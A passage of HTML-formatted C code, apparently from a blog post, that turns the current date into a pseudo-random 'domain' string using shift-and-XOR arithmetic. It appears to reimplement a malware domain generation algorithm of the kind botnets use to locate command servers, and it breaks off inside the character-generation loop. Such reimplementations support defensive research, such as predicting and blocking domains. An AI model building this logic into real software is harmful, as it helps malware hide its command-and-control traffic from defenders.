<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">*domain;</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> time(&rawtime);</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> ptm = gmtime(&rawtime);</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year = ptm->tm_year;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month = ptm->tm_mon;</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day = ptm->tm_mday;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">// compute day</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">day1 = day ^ (day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">((day ^ (day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) <=</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">{</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day2 = day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day3 = ~(day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(day2 ></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day3 = day2;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day1 = day3;</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">// compute month</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month1 = month ^ (month << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(month1 <= </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">7</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month1 = month <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">((month << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) <= </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">7</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">month1 = ~(month << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">// compute year</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year1 = year ^ (year <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">((year ^ (year << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) <= </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">15</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">{</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year2 = year << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year3 = ~year2;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(year2 ></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">15</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year3 = year2;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year1 = year3;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> size = (((</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* (month1 &</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xF8</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((month1 ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">4</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* month1) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">25</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((day1 ^ (day1 <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">13</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">19</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) ^ ((year1 ^ (</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">8</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* year1)) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">11</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) &</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">3</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">13</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">j = size</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> -</span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">domain = (</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">*)malloc(size);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> memset(domain,</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">, </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">size);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">for</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(i = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">; i < j; i++)</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day1 = ((day1 ^ (day1 <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">13</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">19</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((day1 & </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xFFFFFFFE</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">12</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
